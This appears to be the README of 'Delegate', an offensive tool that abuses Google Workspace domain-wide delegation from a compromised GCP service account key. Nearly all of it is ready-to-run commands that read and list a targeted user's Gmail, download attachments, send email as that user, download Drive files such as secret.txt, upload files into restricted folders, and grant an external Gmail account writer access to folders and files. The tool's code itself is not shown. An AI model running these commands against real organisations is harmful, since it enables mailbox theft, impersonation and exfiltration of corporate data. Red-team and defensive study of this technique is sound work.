Delegate

Tool to perform GCP Domain Wide Delegation abuse and access Gmail and Drive data from a compromised Service Account with domain wide delegation permissions configured within Google Workspace.

• Domain Wide Delegation article

Delegate tool usage

Gmail usage

List all Gmail emails (limit 200 emails)

python3 delegate.py -k ../sa_key.json -i [email protected] -m gmail -a list

Read Gmail emails (limit 200 emails)

python3 delegate.py -k ../sa_key.json -i [email protected] -m gmail -a read

List Gmail folders (Labels)

python3 delegate.py -k ../sa_key.json -i [email protected] -m gmail -a folders

Download all attachments within the targeted Gmail (limit 200 emails)

python3 delegate.py -k ../sa_key.json -i [email protected] -m gmail -a attachments

Read all emails within specified folder (Labels) (limit 200 emails)

python3 delegate.py -k ../sa_key.json -i [email protected] -m gmail -a read -f DRAFT

Send an email as [email protected] to [email protected] specifying subject and body email content

python3 delegate.py -k ../sa_key.json -i [email protected] -m gmail -a send -r [email protected] -s "Test Messaage subject" -c "Hello this is a test email"

Drive usage

List all files and folders within the targeted Drive account

python3 delegate.py -k ../sa_key.json -i [email protected] -m drive -a list

List all folders content within the targeted Drive account

python3 delegate.py -k ../sa_key.json -i [email protected] -m drive -a folders

Download locally a specific file secret.txt

python3 delegate.py -k ../sa_key.json -i [email protected] -m drive -a download -t secret.txt

Upload files at user's Drive root folder (My Drive)

python3 delegate.py -k <serviceaccount_key> -m drive -a upload -i <targeted_Workspace_user> -t <localfile> -p <NameInDrive>
python3 delegate.py -k ../sa_key.json -m drive -a upload -i [email protected] -t test.txt -p uploadedTest.txt

Upload files within specific user's Drive folder or organizational Shared Drive

python3 delegate.py -k <serviceaccount_key> -m drive -a upload -i <targeted_Workspace_user> -t <localfile> -p <NameInDrive> -f <DriveFolder>
python3 delegate.py -k ../sa_key.json -m drive -a upload -i [email protected] -t test.txt -p uploadedTest.txt -f Restricted_documents

Modify permissions on specific folder (Add external Gmail account with Writer permissions over the file/folder)

python3 delegate.py -k ../sa_key.json -i [email protected] -m drive -a permissions -t Restricted_documents -e [email protected]

Modify permissions on specific file (Add external Gmail account with Writer permissions over the file/folder)

python3 delegate.py -k ../sa_key.json -i [email protected] -m drive -a permissions -t secrets.txt -e [email protected]